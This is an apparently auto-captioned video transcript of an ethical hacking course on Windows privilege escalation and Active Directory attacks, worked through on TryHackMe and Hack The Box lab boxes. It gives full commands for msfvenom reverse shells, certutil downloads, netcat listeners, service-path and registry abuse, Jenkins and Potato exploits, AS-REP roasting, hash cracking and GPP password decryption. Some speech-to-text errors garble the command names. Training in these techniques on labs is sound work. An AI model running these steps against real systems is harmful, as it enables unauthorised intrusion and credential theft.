Windows Privilege Escalation Compiled Crash Course

Captions
Hey, thanks for stopping by my channel. In this video I have compiled some of my privilege escalation for Windows. I have had a few requests of people trying to search around on my channel and grab different parts of Windows privilege escalation and some Active Directory enumeration, so I've gone ahead and compiled that here for you. This is not the same as what I have in my complete ethical hacking course; this is separate. This is stuff that I have kind of just sprinkled all around on my channel, and I've gone ahead and compiled it here in this one video for you. So if you're interested in Active Directory enumeration, that's going to be at the end of the video, and then the first two thirds of this video is going to be focused mainly on Windows privilege escalation. So let's go ahead and jump into it.

So before we get started too far and we start looking at the output of WinPEAS, I wanted to show you a couple of different resources that you can use. One is this one right here, sushant747. This is a privilege escalation enumeration cheat sheet, and then also PayloadsAllTheThings has one, and theirs is really long and pretty in-depth, so you can choose which one you like. I'd recommend as a beginner to start with sushant747, and these links will both be in the description down below. Very simply, what you can do is copy these little one-liners and paste them in over here, and it will give you an output. And so we're going to see some of these in the future when we run WinPEAS; this is basically what it is running in the background, and it is going to give us the output in color so that way we don't have to look through all of this. So you can copy this and query the registry for passwords, which we will see in the future as well. So these one-liners are basically what WinPEAS is going to be running for us, and we're going to be looking through the output. I just wanted you to know that there are ways out there to do this manually without WinPEAS, because every now and then you will come across a box where you're not able to get WinPEAS to load or to run, and you can still do the enumeration manually with one of these cheat sheets.

So with that, let's go ahead and get set up. Here we are on the TryHackMe web page, and we are going to be doing some Windows privilege escalation. We're going to be working on this specific set right here. There are three different sets of Windows privilege escalation, and I think we're going to work through each one of them, but this one is the one we're going to do first. And there are quite a few different Windows escalation paths; we're not going to do all of these, but we're going to do the ones that I think you probably need to know the most, and the ones that we skip over you can go ahead and work through on your own, and maybe we'll come back to them. But the first thing you need to do is connect your VPN and then RDP into the Windows box that we have and get a reverse shell, so I'll walk you through how to do that. We're going to just copy that, paste it in here, and it will go ahead and launch for us that Windows box. And then the next thing we're going to need to do is make a reverse shell, so we'll go msfvenom, and we need this to be an EXE; change our port, 10.2.1.182, and we are not using Java, we're going to be using Windows, I think it's windows/x64/shell_reverse_tcp, like this, and we can go ahead and make this. This was not the right directory that I wanted to make this in, but that's okay; I guess we'll just transfer it over from right here. And it tells us our final size right there. Not sure why I'm getting all those outputs, but if we ls, we now have the reverse shell right here. I'm going to remove that file.txt. So now we need to move over our reverse shell, so we can go sudo python -m SimpleHTTPServer, type in our password, and now we're listening on this host. And we can come over to our client, our Windows client, and go cmd to open up a command line, and now that we have this open we'll cd to the desktop. So we'll say certutil -urlcache -f -split http://10.2.1.182/ and then we called it reverse.exe, and we'll see if this pulls it over; we should see it pop up over here, and there it is. And now we can close out of this and we can go nc -lvnp, and I think we made it on port 4444, and now if we execute our reverse.exe we should get a shell over here. And I spelled it wrong. So we got our reverse.exe and we have our shell over here.

So now that we have this over here, you could do everything from over here if you wanted, but I find that this is a little more laggy than if I just type over here and run my commands. And so one of the things that we're told to do in the instructions, well, we already got a reverse shell, is to run a file that's already on this box to look for our privilege escalation paths. And so we have this EXE right here; I'm not going to run this. We're going to run WinPEAS because that's more realistic and that's what we're going to be doing in the real world. I've actually never run this file, so I don't even know what is inside of it, but we're going to run WinPEAS. So you can actually go to Google, this first one right here, and you can go down to the release page, and you would grab winPEASany.exe right here and you can download it. I've already downloaded it and I've changed the name to win.exe, and it's inside my tools, which is currently running this RDP, so we're not going to be looking at it. So we'll just go ahead and transfer it over. So what I will do is cd to my desktop and tools, and if we ls we have it right here. And so now we'll set up our Python listener again, and now that this is hosting up the file we'll grab this win.exe and run it. So we'll do the same thing we did before: certutil -urlcache -split -f http://10.2.1.182/win.exe, and that should grab the file, and we can go dir and it tells us that we have it right here. Now we're going to go ahead and run this by running it the same way we ran the reverse shell: win.exe. And I'm going to let this run and then we'll walk through it once it has finished.

Okay, so I believe that WinPEAS has gone ahead and run, so we'll go ahead and start looking through these. And we're going to look through these in the order that we find them in WinPEAS, not necessarily the order that they are showing to us right here. So we're going to do these out of order, at least the first couple, so that way you can see what it's like to actually scroll through WinPEAS and read the output and look at what's available first, rather than me just jumping and showing you, because you need to get used to reading the output and understanding what is here. So we'll go ahead and start scrolling through here, and we can look at Watson. A lot of these exploits from Watson are going to be kernel exploits, and we can come back and try these later, but we're going to skip over these because some of them won't work and some of them take a really long time to actually try and pull off. And then we're just going to get some basic information about the Windows system. We see LAPS is not installed, and we have these cached credentials right here. So if you open this up and look at this, we're not actually going to cover this right now, because we're going to see that you need Mimikatz right here; we're going to extract the passwords with Mimikatz, and for Mimikatz you really should be SYSTEM in order to run this. But if you look at this, you're querying the registry, and you can actually look to see how it's making this query, because what we're going to see here in a second is going to look really similar to this, only we're going to be using the Microsoft Installer to run our exploit. So you have this right here, you can read through it and learn about it, but we're not going to be using that right now. So you have a cached logon account, and it tells us that there's no AV detected; this would be really bad if it was in the wild. And we can see right here that any local account
can be used for lateral movement, which would be really good for us if we were on a network. And then we keep on scrolling down and we see we have this AlwaysInstallElevated right here. Now if we come over here, we can see this is one of the things in the registry we are looking for, and so in order to grab this, you wouldn't have this laid out just like this in the real world, so we're not actually going to use this, but we have this registry AlwaysInstallElevated right here. And we can come back over here and open up HackTricks right here, opening a new link, and we're going to have something that looks really similar. So if we wanted to, we could make this same query like we were shown over here inside of TryHackMe. So you could just highlight all of this and we could make this query over here. I don't really want to scroll all the way down, so I guess we could come over here and do this, and you can see our output, which we have this 0x1, which it actually tells us about over here: note that both of these are set to 0x1. So we have this exploit we can run; that's why WinPEAS found this for us. So we'll come back over here and it's going to tell us what we need to do. We need to make a Meterpreter payload right here, so we have this msfvenom payload that they tell us we can use right here. I actually don't like this, the way they give us this payload, so what we can do is use this payload right here, and we'll come back over to our tools, and I guess we'll make the payload right here. So we can leave all of this, we can leave the port, and we can change this to 10.2.1.182, which is going to be whatever your IP address is, and then we can create this. This looks exactly like what we made when we made our reverse shell; the only difference is instead of an EXE we're going to be using this Microsoft Installer extension right here, and our port's different. So we can go ahead and host this file up, and we can grab it over here on our Windows machine. We still have our reverse shell, and we do, so we're going to run the certutil -urlcache, and if you haven't noticed yet, you should go ahead and try and memorize this: -split, http://10.2.1.182/, and I don't remember what we called this; we called it reverse.msi. Just copy it so that way I don't have a typo, and that should go out and hit our server and grab that. And now we can run it, and we're told how to run it right here, but just for the sake of, like, actually walking through this and pretending like we don't have the answer sheet, we can come back over to HackTricks, and if we scroll down a little way they actually tell us how to run this, and then we need to run this with our path. So we can copy. I think we're actually in the users right here, so we can paste, and then we are the user "user", and this is inside of Desktop, and we should be able to run this, but we will need another netcat listener, and it is on port 53; port 53 is where we made this payload to listen at, right here. And if we run this, hopefully we get our shell back. And we didn't, so let me see what I did wrong. I did not put in our actual file to execute, so we can paste this, slash, and then we need to put in our reverse.msi right here. And that went awfully fast, but it worked for us, and so now we should be SYSTEM. If we say whoami, it tells us we are SYSTEM. So that is how we would elevate if we see that AlwaysInstallElevated from our WinPEAS output back here, just like this. So that's pretty simple; all you would need to do is open HackTricks and basically just follow along with what they say. So that is the first one that we come across in WinPEAS, and now we will continue looking and see what we can find.

Okay, so let's go ahead and keep scrolling through here. We're going to see NTLM settings, nothing helpful, and we'll keep scrolling through here. We have user information, and this is our RDP session; keep on scrolling through here, and we have this file permissions right here. We also have, see, this DACLs; we'll do this one first and then we'll come back and do this modifying changes. So we have this file permission, this filepermservice.exe right here, and it tells us that we have file permission Everyone AllAccess. So if we do the same thing we did before and open this up, it will tell us what we can do with it, and so we can run this right here: we can put the service name and then we can tell it that we want it to run it. So we need to move our reverse shell into the path, because everyone has the ability to write to this. So what we can do is come back to our bottom here, and we can type in our copy and then our current path to our reverse shell, which is on our desktop, so we can copy this, paste, and I think we called it reverse.exe, and we'll just set up a netcat listener over here on port 4444, because I think that's what we made our original payload on. So I think this is the port we made our original payload on; we will find out. So we want to copy that, and now we want to put it in the actual file path, and I guess we can scroll back up and try and find it right here. And so you can just copy this completely as it is with the quotations, go all the way back down, paste this in, and then we tell it yes, we want to go ahead and run this, like this. And it says that it copied it, and now we should be able to start this service, and it should give us a shell back as long as we are listening on the right port. So now we can tell it net start fileperm, and what was that service, svc? It tells us that we have this wrong; I forgot an e right there. So net start filepermsvc, and it should be running for us and going through that path, and we get a shell back. And if we do whoami, we are SYSTEM, so now we are root on this box again. So that is how we would abuse this file path that is writable to everyone: we would write to it and then we would execute the file. You can think of this kind of similarly to Linux with /bin/bash; we're putting something inside of the path, and then the file gets executed when it tries to actually execute this
executes our file for us and then we can close this quote off and that looks right so that should go ahead and it tells us that it copied the file over and it should have saved it as the common.exe and now at this point we will want to net stop and I'm going to just copy this right here to avoid all typos and we can run that and it's going to tell us that it is not started which is probably what it's going to tell you as well and then we can go net start and then paste that in there and run it and I did not start up a netcat listener for that reverse shelf so it did not work so I'll just copy this paste rerun it and hopefully we get a shell over here and we do and who am I and we are Authority system so what we did just remind you again is we have this file path right here and it tells us it has no quotes and there are spaces if you have spaces like in a Cali machine a lot of times it just isn't going to work unless you have it quoted but in Windows you can name files and directories without a quote and if we can inject something in here and then we run the service that is automatically going to go through the file path it's going to hit our reverse shell that we were able to put in here and it's going to execute it as long as it has the start to one of the file names or some other kind of executable file so we put it in here and it goes through this path and it executes everything in the path as the authority system as root and it gives us back a shell over here so we can close out of that and we can come back over here and we can look at this one right here okay so we are right here and if you remember we already opened this up and it is right here and so we're still looking in the permissions area and what we're going to do is something very similar to this right here only difference is instead of putting this in a start we're going to put this in the bin path so this SC right here if I remember remember right it just is a system service that is ran on Windows 
sometimes you'll see it as the sc.exe when we want to do some kind of command on Windows systems you can actually Google it and I'm sure it's you're going to get a lot better explanation of what this SC does but sometimes you'll see this as sc.exe and what we need to do in order to modify this service is very similar to what we see right here so I'm just going to go ahead and copy this so I have it to my clipboard and we're back over here on the user desktop so what we will do is type in this SC config we're going to paste in what we just copied and then we're going to tell we want this in our bin path and then we're going to put our actual reverse shell in the bin path which is inside of this directory right here so we'll copy this paste this in and then we want it to run our reverse dot exe so we should be able to come back over here start our netcat listener close off our quote and see to make sure that it says that it was successful in Saving it and we can run the same as we did earlier which is our net start and then we want to start our service path which is right here so we can paste that in and hopefully that runs and we get a shell back over here so I think you should be starting to notice a similarity so the reason all three of these exploits so this one right here the file permission service and the unquoted path these are all labeled under the Hat Tricks right here as interesting services and we have this non-microsoft and they're all in this one URL because they're very similar what we're doing is putting a file inside of one of these paths or directories that the Windows machine is going to execute as the root user or the NT Authority system and all we have to do is listen over here and restart the service because we're able to restart the service it will go through and run this as NT Authority system and it will give us back a shell so these are all very similar in the way they run and you can go and read more about them I think they're pretty simple 
to understand and pretty easy to run you're not going to see these very often in ctfs because they're too simple a lot of times when you're doing some kind of Windows privilege escalation even on a certification exam you're going to find some random file or some vulnerable service that winpies is not going to pick up so with that we'll go ahead and look at the next vulnerability so I think we'll do a few more of these really easy privilege escalations and then we'll move on and we'll skip ahead to some of the more in-depth ones so we will at this point we can just move on and look at the weak file permissions which is just the one after our unquoted service path that we just did and you can see this red service there's actually quite a few privileged escalations you can do with this service right here but this one is not very far down in winpies so if we just scroll down a little bit we get this right here looking through service registry and we get this Interactive full control so this is it going to be pretty bad so we can come over to look at what we have here and we can actually just hit our Command find and we're going to end up doing is adding in our reverse shell and we're going to do the same thing we did before with the net start and we're going to run the reg service and it's going to give us a reverse shell so what we'll do is just copy this right here I'm going to open up a file so we'll close out of this we'll open up a file and modify it right here so we have this reg add and we're going to add in to the service name that we're going to be modifying and that is the reg service and the path to the new binary which is going to be our reverse shell which we have typed out several times at this point and we're going to just copy this come over here I can't remember if I copied the C I did delete this and it now has the path so we should be able to copy this and run it over here and it tells us the operation was complete and now we can do a knit start reg 
service the SVC and we need to be listening on a shell so we'll close out of that we'll be listening on a netcat listener to get a shell rather we'll run it and we are system if I can type right and there we are so all we ended up doing was abusing this right here since we had full control of this registry service we are looking to see what permissions we have now this registry service is something that we can query and I'll just show you in my notes I have a whole bunch of different ways to query the registry service and you can actually get these notes on GitHub that's where I found them a long time ago and you can just paste these in if you actually go over to my complete ethical hacking course I actually walk you through looking for passwords and there's a bunch of different one-liners you can paste in here and see if you can pull them down and I actually think this machine is vulnerable and has stored passwords that we are able to find which we'll look through later but the registry service is something you're going to want to look at to see if you can abuse so if we run this one liner right here I've actually seen this a few times on ctfs where you just sit here and you look through like these users and you can read over here and find passwords and I'm sure that this box because it's vulnerable every direction if you look through here eventually you will come across a password and I'm actually pretty sure that this is one of the future vulnerabilities that we're supposed to look for okay so I have gone ahead and opened up the box Jeeves on hack the box and ran an in-map scan so that way we have the open ports here and I'm just going to go ahead and tell you that we're going to look at Port 80 and poured 50 000 so what we can do is just type in the IP address and then go to it and we are brought to this Ask Jeeves page right here and if you search nothing really works out for us so we'll go ahead and check out 50 000 and we see we have this problem is 404 so 
automatically what we should do is run F and we can come back here and run 10 10.63 and we're actually going to need to run a different word list because this specific word list that we have going right here doesn't have the directory in it that we want we want to run der Buster and then we want to run a directory list and 2.3 and we want the medium text just like this so we press enter and this will start running for us and hopefully it will pull back for us what we need and actually I did that wrong we need to be fuzzing for 50 000 so we can come back to our IP and we're going to tell it we want Port 50 000. that looks right so we'll run that and then we see we have this Ask Jeeves right here and this is not the only CTF that has this Ask Jeeves right here so you're going to want to remember how to do this exploit with this Jenkins service it won't be Ask Jeeves it'll be a Jenkins service because I just saw this a few weeks ago on a different platform and for some reason the Box seems to be going kind of slow hopefully it doesn't affect anything but we can come in and look at this manage Jenkins there's two different ways to get a shell on this box we're going to do just the simple way we can go to the script console and then anything we put in here will execute on the server and give us a shell back the other way is to actually come and create a project and do a build history and you can execute code by actually compiling it and clicking build but we're not going to do that in this specific example so now what we can do is we can just come to Google just type in Jenkins reverse shell and check out a GitHub page and I think I have a typo in there I do but we want this one right here this Java reverse shell and this right here will work for us so we can go raw command a command copy come back to this little console to the beginning we're going to change to our IP address and mine is 10 10 14 5 and we can use port 80 for four that's fine so we come over here and 
say netcad lvmp 80444 run now that we're listening we can run this and hopefully we get a shell back over here when it executes and we do so now what we want to do is send this over to a meterpreter session so we can open up a new tab and type in MFS console just like this and let this run and then we are going to set up what we need to move the shell over from over here our netcat listener to the Metasploit console so what we'll want to do now is Type in use exploit multi-script web delivery just like this we can type in options to see what our options are we're going to show targets and we're going to use two this two right here is a Powershell uh we'll set Target to two since U's doesn't work for us so now that should be set we can set the payload to Windows interpreter reverse TCP just like this and then we're going to set our L host to ton 0 we will set the SRV host to Aton 0 as well and then we can look at our options again and make sure everything looks right and it does so we can type in run and it's going to give us this little Powershell script right here and it's going to be base64 encoded the reason this is a base64 encoded is because sometimes Windows likes to use Powershell with base64 encoding you're actually going to come across this quite a lot and we'll run this and see if we can get a shell back over here and it did not work for us let's try this again and it says now that it's working so we have our shell so now we can type in sessions and we can say use session I think we type in sessions Dash I want to get an interactive shell and then we say who am I and it says unknown what happens if we just type shell who am I and now we have our shell working over here for us and so we can say background put that in the background for us okay do we want to exit yes we can background from here and now that is set in the background and what we'll want to do is run the multi exploit suggestor for Windows so we'll type in use post multi-recon local exploit 
suggestor options and then we want to tell it to set session to one and then run and this will run for us and it's going to tell us that we can use juicy potato okay so that took a little while to run and it got interrupted I'm gonna go ahead and just use juicy potato for us so what we're going to do is type in use exploit and then we want Ms 16 underscore zero seven five and let's see if it's in here let's just search j u i c if anything comes down and we have right here this one is what we want to use so we will use one options and we want to set a session to one and then run this and see if we can get a shell back add an issue the first couple of times because I did not change my Local Host to ton 0 and now I have fixed that and it says the session is open but no session was created so now what we want to do is go to that session so we can type in session two and we can run this and then we can check to see if we have any tokens so we can tell it to load Incognito and then I spelled that wrong so load in cognito and then we want to tell it to list tokens Dash U I think that is how we list those and it tells us we can use NT Authority system so we'll go ahead and copy this right here so we have it spelled right and then we're going to say impersonate token and then we want to paste that in what we just copied and it tells us that it is not spelled correctly let's try copying this instead so we'll delete this paste and it says that it works if we say who am I we can go shell who am I and we are Authority systems okay so at this point we're going to transition over to try hack me so if you'd like to follow along you can go ahead and connect your VPN and open up the windows prevask box and we're going to go ahead and start working through this also a another reminder if you are new to this course and you haven't watched the previous one it will be helpful for you especially if you're new to the world of penetration testing and windows privilege escalation to watch 
part one of this series it will make a lot more sense before you start this second portion so let's go ahead now and jump into it okay so I have gone ahead and launched the box that we are going to be working through this is the same as the previous section of Windows privilege escalation that we were working through and you can double click this and put it into your terminal launch it and you will have access to the RDP session now what we will do first is the printer spoofer because it is the easiest and then we'll go ahead and do rogue potato and I'll try to walk you through what exactly is going on and how it works the first thing we're to do is get a shell so we can copy this come over to our RDP session open up a command prompt and we're going to need to run this as administrator and the reason we have to run this as administrator is because we're going to be using PS exec and PS exec is a Windows system that is going to give us a shell back and we're going to tell it we want a shell back as a local user and the password is password one two three and now if we say who am I it's gonna tell us we are the admin so if we run a who am I slash priv like this we're looking for this Essie impersonate privilege right here and it says that it is enabled and it's going to be enabled as admin but it will also be enabled as a local user if you come through at some kind of Windows system which is why we're coming through PS exec a lot of times in the wild when you come across this SE impersonate privilege and it's enabled it's because you've uploaded some kind of file and it's been executed on the server and it comes through a Windows process so in order for us to have this as a low-level user we're going to have to use that payload that we had copied so we'll come back over here because apparently it is not on my clipboard paste it in and we need to pull our shell over so I always call mine rev.exe and before we're able to do that we're gonna have to create our payload 
which I think I already created. It's the same thing we did last time; we'll just use this msfvenom, you'll change your port and you'll call it rev.exe. So we'll go ahead and close out of that and I'll pull that over the same way we did last time: certutil -urlcache -f -split, http 10.2.1.2 is my IP, and then /rev.exe, and that is not a dot. Then we can come over here and go sudo python simple server, and we'll run this and it'll come over and grab our reverse shell. So now if we say dir, we put that in the wrong spot, whoopsie doopsy, we'll go ahead and cancel that, but we'll get our shell here and then we'll move it in a second. Actually, we'll just go ahead and move it now: cd .., cd .., cd PrivEsc. The reason I'm using the PrivEsc folder this time and I didn't last time is because they already have the PrintSpoofer in here somewhere, and we're going to go ahead and just use this exe, and I'll show you how to pull it over so that we don't have to type in the same certutil a bunch of times. So we'll pull over our reverse shell into the right place, and then we will have to run it, so we'll just copy this and say rev.exe, and we'll need to make sure we are listening. So now we are listening, so now we can run this like this, and the reason we want to run the command they have right here is because we have to run as a PsExec, and now it has finally run and we should get our shell back, but we did not run rev.exe. Now if we say whoami /priv you will see that we have a lot less permissions, but we still have the SeImpersonate, and if we just say whoami you're going to see that we're a local service instead of admin. So what we'll do now for the PrintSpoofer is we can just come back, cd into the PrivEsc, and we can run the PrintSpoofer, so we should be able to just type in, let's see if we can just run the printer, let's see if we can just run a PrintSpoofer.exe, and it does not let us; it says it's unrecognized, and
it is possible that it didn't work because I didn't run it with these capitals, but we'll just go ahead, and for the sake of this we'll just give it the full path and we'll say PrintSpoofer, and it tells us we need to enter in our commands. So we should be able to run the PrintSpoofer.exe with the -h and it will tell us what we need to do. It tells us we need to execute the command line, and it tells us that we need it to interact with the process and we need it to run a command. The command we're going to run is our reverse shell, so what we can do is just paste that back in there; we're going to tell it the command we want to run is our reverse shell, so we're just going to say rev.exe and then close off the quotes, and we'll say -i, and then we should be able to open up a new netcat listener over here. If we run this, it's going to tell us that it is using the SeImpersonate privilege and see if it can create a new shell, and it does, and so if we say whoami we are now NT AUTHORITY\SYSTEM. So that is the PrintSpoofer.

Now we're going to go ahead and check out the token impersonation with RoguePotato right here. So now we have our shell; go back to cd PrivEsc, and now that we're back in here we'll have the RoguePotato sitting in here somewhere, right here, and I want to walk you through what is happening over here. So the way RoguePotato works is a little different than Juicy Potato. With Juicy Potato we're able to just use port 135 for the RPC client, and you'll see this open sometimes, but Windows changed it for RoguePotato, making it so that we had to get the token through port 9999. So what this does is we basically just send a request to our attack machine that then redirects it back to the Windows machine to port 9999, so that's what this one line does right here. And then when we run RoguePotato we just tell it our remote IP address, the shell we wanted to execute, and that we're going to be listening on a port 999. So it is possible
that this won't work with our exe, because I have had trouble in the past getting this to work with the exe and I've had to use a PowerShell, and we might have to go ahead and do that, but we'll try it this way first, and then if that doesn't work we'll use PowerShell. So we will need to get our shell, which we've already done. We're going to set up this listener right here, and so rather than me typing all this out we're going to just copy it, paste it, and now we have this forward working for us right here; it's going from port 135 to 999 on the Windows box that we are attacking, and we can use this RoguePotato that is set out for us right here. So we'll paste that in, and then you'll have to use your actual IP that you are running with, and mine is 10.2.1.182, and then we are going to execute our reverse shell, and we'll be listening on port 9999. So we'll come back over here, set up our netcat listener on port 9999, and we can finish typing this out: so we want to execute our reverse shell; we'll copy this so I don't have any typos, /rev.exe, close that off, and then we want to listen on 9999. So we'll run this and see if we get a hit back over here. Sometimes it takes a few seconds, but if we don't we'll run it a couple of times, and if this doesn't work we will use the PowerShell version, because I have had trouble in the past getting this to work. I needed to be listening on port 444 over here and not port 999, so we'll copy this again, paste, enter, and we get our shell back. whoami, and we are NT AUTHORITY\SYSTEM. So that was kind of a workaround, um, so we don't actually need to run that with PowerShell; I just was listening on the wrong port because I had this in my mind and not port 444, which is what we set up with our reverse shell. So that is how you would use the RoguePotato with the port forwarding over here from our local machine to the attack machine.

Okay, so here we are. I have already run the nmap scan on the box Forest, and I ran this so that you could look at what a domain
controller looks like when you run an nmap scan against it. You're going to see usually a lot of ports open, but the one that matters the most, I think, is this port 88. When you see this, you can automatically think domain controller, because it is going to be doing Kerberos authentication, and I think port 88 is only open for domain controllers; if not, you can let me know down in the comments, but I'm pretty sure this indicates that it is a domain controller. So when attacking a box that looks something like this, the first thing I always do is go to smbclient and smbmap and CrackMapExec, and so we'll go and check this out. So we can go smbmap, and then I think it's a -H for this tool, and we're .161, and we'll see if there's any shares that we can access, because often in CTFs, if there are any shares, then we like to look at them, because there's often information stored in them that helps us solve the box. So I think smbclient is a -L 10.10.10.161, enter, and I know some people like to do a null authentication like this; not actually sure if that is supposed to be uppercase, and it says we get a, it failed, so we are not able to access anything in the file shares. The next thing I like to do is go to this RPC right here, because we have access to a tool called rpcclient and we can pull down users; also we can use LDAP and pull down users through that as well. So what we can do is come over here and we'll just use ldapsearch first, and, actually, we'll use rpcclient because it's easier. So we'll just say rpcclient, just like this, and I don't actually remember the commands that we're supposed to use. We're going to use this in, this is very important, because this is an update that you will need to use; if you don't, nothing is going to work for you with rpcclient. So we can say rpcclient, and we're going to go like this with no user, we're going to tell it we don't want it to ask for a password, and then I think we can just give it the IP address, and it lets
us in. So now we can hit tab twice and it'll give us all the options. That's a lot of options; I don't want to see all those, but what we want to do is enumerate the domain users, enumdomusers, I think that's right, and this will give us the users right here. So we have these as the users; we also have the administrator up here, the guest, the krbtgt, so the ticket granting ticket service, which doesn't really mean anything for us, and we also see that there's this RID number right here. You can actually copy these and paste them into Google; I'm not sure if it will tell you what they are assigned to. These are like a user ID for Active Directory; you get a RID whenever you create an object, and I think they're used like a SID number. I'm not actually entirely sure exactly how these are assigned, but that's kind of what they do; you can Google it if you want to know more about them. So now we can go see another way to grab the users, because rpcclient and LDAP sometimes bring down different users, or a different set of users, and it's always best to double check, because these are just tools. So we can go ldapsearch, and then we want to run the host, so we'll say -H 10.10.10.161. We want to just send this and see what happens; I think we need to run a -x and a -s base and the naming context, like this, and it's telling us this doesn't work because we're giving it the capital H. This recently changed, and we have to put in here ldap:// like this, and it's going to tell us the naming context, which actually didn't really help us out much. Let's see if our nmap scan had it; we're looking for the DC name, so htb right here, this htb.local. So it tells us we don't actually need to run the naming context now that we have that, so we can delete all of this. If the nmap scan didn't pull this back right here, this is one way to get that htb.local. So now we can type in -b and then DC=htb,DC=local, and we get a bunch of information back, so you can actually read through here. This isn't going to
be our final destination, but there is sometimes some interesting information in here, the sAMAccountName, but I'm not going to bore you with reading that because that's not actually what we're after. What we're going to be after is an object, so what we can do is tell it we are after a very specific object, and we want the objectClass of user. One of the things you should know is you can actually just copy this right here and save it somewhere so that you have it and you don't have to go through all of this; you might have to check the naming context, but that would be it, and then you can just paste in what we're about to type in here. So we're going to grab the sAMAccountName, and I think I'm actually just going to copy it from up here where we saw that so I don't misspell anything, paste that in, and then we're going to grab the sAMAccountName, and then we can run this and see what happens, requesting the account name. Okay, so I unquoted this and it worked for me. So now we have the usernames that we saw earlier, and if you notice we're actually missing one that we had earlier, so let's go up to the rpcclient, and the one that we actually needed is not in the ldapsearch. So this is why you would run both, because we're going to end up needing this svc-alfresco in order to complete the box. So if we were to run something like this, we could copy this, come over here, we'll gedit users.txt to paste these in, and we can cat the users.txt, and then we want to awk and we want to cut at the second position, so we can say print like that, and we can just grab these and put them into our file. So now we can gedit this and delete all of that, and now we have these users, but we also need that one we just saw, which was the, was it svc-alfresco, like that, I believe. So we can save that, come back over here and check this out, make sure we got the right user: yes, svc-alfresco. So now that we have a list of users, what you can do is go to CrackMapExec or
Kerbrute and start brute forcing for passwords, but I think we'll save that for another video, because that is not the direction of this box. The direction that this box goes is to go to an Impacket tool with our user and check out the GetNPUsers, and so this actually comes installed on Kali automatically, so it's impacket-GetNPUsers, like this, and we'll run -h to see what our options are, and we'll see if we can pull down a hash for one of the users that we have. So we can type in GetNPUsers and then we give it the domain controller IP, so -dc-ip 10.10.10.161, and then we want to request from htb.local/, and you actually need this little slash here, this trailing slash. Recently I was running a tool that took me a while to figure out why I was getting a syntax error, I think it was Hydra, and I needed the slash at the front, so you do have to be aware of these slashes sometimes. So if we run this it gives us back this hash, and with the updated hashcat it should just crack this automatically. So we can just say gedit hash.txt, paste this in, save, and I actually have not opened up rockyou.txt, so let's see if hashcat has an automatic word list in it. We use hashcat, hashcat hash, and then we don't have a word list, so let's see what it does, I guess, while this runs. Okay, since this says it doesn't have enough memory, what we'll do is copy this; when it says it doesn't have enough memory allocated, it is because I don't have enough memory allocated to this specific VM. I actually have a different one over here that runs with a lot, so we'll just come over here and paste in the hash and save it, and we'll run hashcat over here: so hashcat hash.txt, and we want to run it with rockyou, and I do have rockyou opened up on this specific machine, so it should run and pull down the hash for us, and it does, and we're told that it is service. So now we can copy this, come back to this machine, and we can gedit our user.txt, and we are going to paste this in because we saw
that this hash belongs to this user right here. So now if we save this and we come back to our nmap scan, we can WinRM into this machine and get user. So we can close that and scroll down to the bottom, we can cat our users.txt, and we can say evil-winrm, and I think it wants a user of svc-alfresco, so we'll go -i, now it should run, and we are user on the box. So if we give a whoami we're going to be at this svc-alfresco right here. So we are going to do a post enumeration for Active Directory later on, but for now we're going to go check out the SMB enumeration.

All right, we're going to be starting with the box Active from Hack The Box, and so I went ahead and ran this nmap scan. The IP address is 10.10.10.100; I ran it with a -T5 because I didn't want to wait, and it wasn't pinging, so I went ahead and did the -Pn, and we have the nmap scan here. Now this is what a normal-looking Active Directory nmap scan is going to look like. Sometimes you'll have a port 80 open, or you'll have a web server; sometimes you won't, and when you don't, you can just look at this and you can just think, okay, here's what I need to do: I'm going to start, if it were me, I'm going to start right here, 139, 445, then I would go to 398, for, so this is just kind of my method that I would be working through this, if this is how I'd go about it. So what we are going to start off with is looking at this port 445, and we'll come over here and we can actually just type in smbmap, and it will look just like this; you've seen this before. What we're doing is looking to see if we have any file shares that we have access to with anonymous login, so we can go ahead and run that and see what it pulls down, and it says we have access, read only, to Replication. So you've seen this also before: so we run this smbmap, and then we can also run smbclient, and then it's //10.10.10.100, and then we can run this /Replication, and then we can do a -c, and then we
can type in recurse, recurse ls. So what this is going to do is it's going to go through and it's going to run through all of the files and it's going to list them out for us, and this is helpful if you don't mind having your terminal full of stuff, but I like doing this because the other way to go about doing this is to actually log in to the SMB server anonymously and then go through and manually look at everything, and that just takes a lot of time and it's a lot of typing, and it's a lot quicker to just use that command we just saw. But if you wanted to go ahead and do it the manual way, what you would do is just type in smbclient, and then we can type all this in, and we'll just delete this, and then we hit enter, and it should load us with a command prompt, and then you would just have to go in here and you can ls, I don't remember, yeah, dir works too, and then you would just see this little D right here, which means it's a directory. So you would go ahead and then you would cd into active.htb, and then you would go ahead and look at the files again, and then you would choose whatever folder you want to go into, and so on and so forth, and it just really takes forever, so it's a lot quicker to do it this way. When this loads for us, we can start all the way at the top and we can look and see, okay, if we cd'd into active.htb this is what you're going to see, and then the way smbclient works is it just is going to go through and list for us each one of these files; it's going to load, it's going to cd into the next one and then it's going to list it, cd into the next one and it's going to list it. And so if it were my first time going through here, I would remember these, they could be useful, and then I would just keep on scrolling, but I would definitely look at Users if I was, uh, first time on this box, see if I could pull down some users, because if you have a user you can try and pull down hashes, which we're actually going to see a little bit later with some Impacket tools. So
if you can get a user, you might be able to get lucky enough to pull down a user with a password or a password hash that we can crack, and we are actually going to see this, so that is helpful that it has users listed there. If you were on a CTF or some kind of certification, it's possible that they would just throw this user here and then they would give you just a whole list of users just to lead you down a rabbit trail, so you've got to be careful of doing something like that. So we have the registry policy, we have Groups, and at this point this is something that's interesting, because if you have this Groups.xml and you have it inside the Policies, this actually is going to have for us the information we need. So in order to grab this file, because we're already logged in right here on this SMB server, we can go ahead and just copy this entire thing and save us some time, and we can go ahead and cd to this location. I don't really want to get this, um, at this specific spot, so what I'll just show you what we're going to do is you would go ls and you'd see this, and then you can type in get and then Groups.xml. I'm actually going to move over to a different folder and grab this, because it's going to be grabbing right here in my Linux box and I don't really want it there, but that's how you'd go ahead and get this folder. So I'm going to pause the video and I'm going to switch locations, and then we'll go ahead and get this file and look and see what's inside.

Okay, so we're going to grab this file, we can close out of here, and then we can go ahead and ls, and then we can cat this out and we can see what is in here, and so we see we have a password; it is hashed, and we're going to go ahead and crack this. So what we'll do is we will highlight the entire thing. Now, I don't expect you to know this, but whenever you see something inside the Group Policies, you can know that this hash is going to be the Group Policies hash, so you can actually type in gpp-decrypt, just like this, and
